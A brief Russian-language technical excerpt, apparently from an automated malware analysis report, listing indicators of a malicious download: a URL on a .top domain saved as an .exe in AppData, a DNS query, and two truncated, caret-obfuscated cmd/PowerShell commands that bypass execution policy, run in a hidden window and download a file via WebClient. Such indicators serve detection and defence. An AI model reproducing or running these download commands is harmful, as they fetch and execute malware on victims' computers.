Техническая информация
- http://www.vopergooda.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ers^HelL.e^Xe -eX^eCUT^I^ON^pOL^iCY ^b^YpA^Ss -n^O^PROFilE -W^inDOw^S^T^Y^l^e ^H^iDD^EN (^neW-O^B^J^E^ct s^y^S^TE^m^.ne^t.^we^bc^l^I^ENT^).D^OWnloAdfILE('http://www.vopergooda.t...
- DNS ASK vo###gooda.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ers^HelL.e^Xe -eX^eCUT^I^ON^pOL^iCY ^b^YpA^Ss -n^O^PROFilE -W^inDOw^S^T^Y^l^e ^H^iDD^EN (^neW-O^B^J^E^ct s^y^S^TE^m^.ne^t.^we^bc^l^I^ENT^).D^OWnloAdfILE('http://www.vopergooda.t...' (со скрытым окном)